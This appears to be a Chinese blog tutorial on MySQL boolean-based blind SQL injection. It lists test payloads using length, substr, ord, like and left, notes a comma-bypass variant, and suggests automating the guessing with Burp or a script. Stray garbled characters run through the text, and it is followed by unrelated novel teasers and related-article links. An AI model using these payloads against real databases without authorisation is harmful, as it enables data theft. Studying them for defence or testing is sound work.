Mysql-布爾注入

當頁面存在注入點驾诈,但只顯示查詢到的信息是否為空衣陶,可以使用布爾注入

長度判斷:
?栗子: 1' and length(database())>=1
?當and后面的條件不滿足時财饥,數(shù)據(jù)庫不會查詢到任何結果,因為條件恒為假

判讀第一個字符:
?1' and substr(database(),1,1)='a'
?1' and substr(database() from 1 for 1)='a' --(繞過逗號)
?1' and ord(substr(database(),1,1))=115
?1' and database() like 'c%';
?1' and left(database(),1)='a'

當判斷正確的時候务嫡,頁面提示查詢到甲抖,就表明第一個字符猜對了,那么就繼續(xù)猜測第二個字符
當然我們不會自己手動去測試(試完手會斷)
一般會使用burp爆破或者寫一個腳本跑

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末心铃,一起剝皮案震驚了整個濱河市准谚,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌去扣,老刑警劉巖柱衔,帶你破解...
    沈念sama閱讀 218,036評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異愉棱,居然都是意外死亡唆铐,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,046評論 3 395
  • 文/潘曉璐 我一進店門羽氮,熙熙樓的掌柜王于貴愁眉苦臉地迎上來或链,“玉大人,你說我怎么就攤上這事档押“难危” “怎么了?”我有些...
    開封第一講書人閱讀 164,411評論 0 354
  • 文/不壞的土叔 我叫張陵令宿,是天一觀的道長叼耙。 經常有香客問我,道長粒没,這世上最難降的妖魔是什么筛婉? 我笑而不...
    開封第一講書人閱讀 58,622評論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上爽撒,老公的妹妹穿的比我還像新娘入蛆。我一直安慰自己,他們只是感情好硕勿,可當我...
    茶點故事閱讀 67,661評論 6 392
  • 文/花漫 我一把揭開白布哨毁。 她就那樣靜靜地躺著,像睡著了一般源武。 火紅的嫁衣襯著肌膚如雪扼褪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,521評論 1 304
  • 那天粱栖,我揣著相機與錄音话浇,去河邊找鬼。 笑死闹究,一個胖子當著我的面吹牛幔崖,可吹牛的內容都是我干的。 我是一名探鬼主播渣淤,決...
    沈念sama閱讀 40,288評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼岖瑰,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了砂代?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 39,200評論 0 276
  • 序言:老撾萬榮一對情侶失蹤率挣,失蹤者是張志新(化名)和其女友劉穎刻伊,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體椒功,經...
    沈念sama閱讀 45,644評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡捶箱,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,837評論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了动漾。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片丁屎。...
    茶點故事閱讀 39,953評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖旱眯,靈堂內的尸體忽然破棺而出晨川,到底是詐尸還是另有隱情,我是刑警寧澤删豺,帶...
    沈念sama閱讀 35,673評論 5 346
  • 正文 年R本政府宣布共虑,位于F島的核電站,受9級特大地震影響呀页,放射性物質發(fā)生泄漏妈拌。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,281評論 3 329
  • 文/蒙蒙 一蓬蝶、第九天 我趴在偏房一處隱蔽的房頂上張望尘分。 院中可真熱鬧猜惋,春花似錦、人聲如沸培愁。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,889評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽竭钝。三九已至梨撞,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間香罐,已是汗流浹背卧波。 一陣腳步聲響...
    開封第一講書人閱讀 33,011評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留庇茫,地道東北人港粱。 一個月前我還...
    沈念sama閱讀 48,119評論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像旦签,于是被迫代替她去往敵國和親查坪。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,901評論 2 355

推薦閱讀更多精彩內容

  • Repeater Burp Repeater(中繼器)是用于手動操作和補發(fā)個別HTTP請求宁炫,并分析應用程序的響應一...
    Eva_chenx閱讀 9,673評論 1 12
  • Getting Started Burp Suite 是用于攻擊web 應用程序的集成平臺偿曙。它包含了許多工具,并為...
    Eva_chenx閱讀 28,685評論 0 14
  • Sql注入定義: 就是通過把sql命令插入到web表單提交或輸入域名或頁面請求的查詢字符串羔巢,最終達到欺騙服務器執(zhí)行...
    付出從未后悔閱讀 696評論 0 3
  • sqlmap用戶手冊 說明:本文為轉載望忆,對原文中一些明顯的拼寫錯誤進行修正,并標注對自己有用的信息竿秆。 ======...
    wind_飄閱讀 2,048評論 0 5
  • 太陽從身子后面照過來 打在背后 曬得人懶懶的 一點點風 一點點食堂燒飯的味道 不是太藍的天 天上沒什么鳥飛過 有云...
    榴心文閱讀 215評論 2 1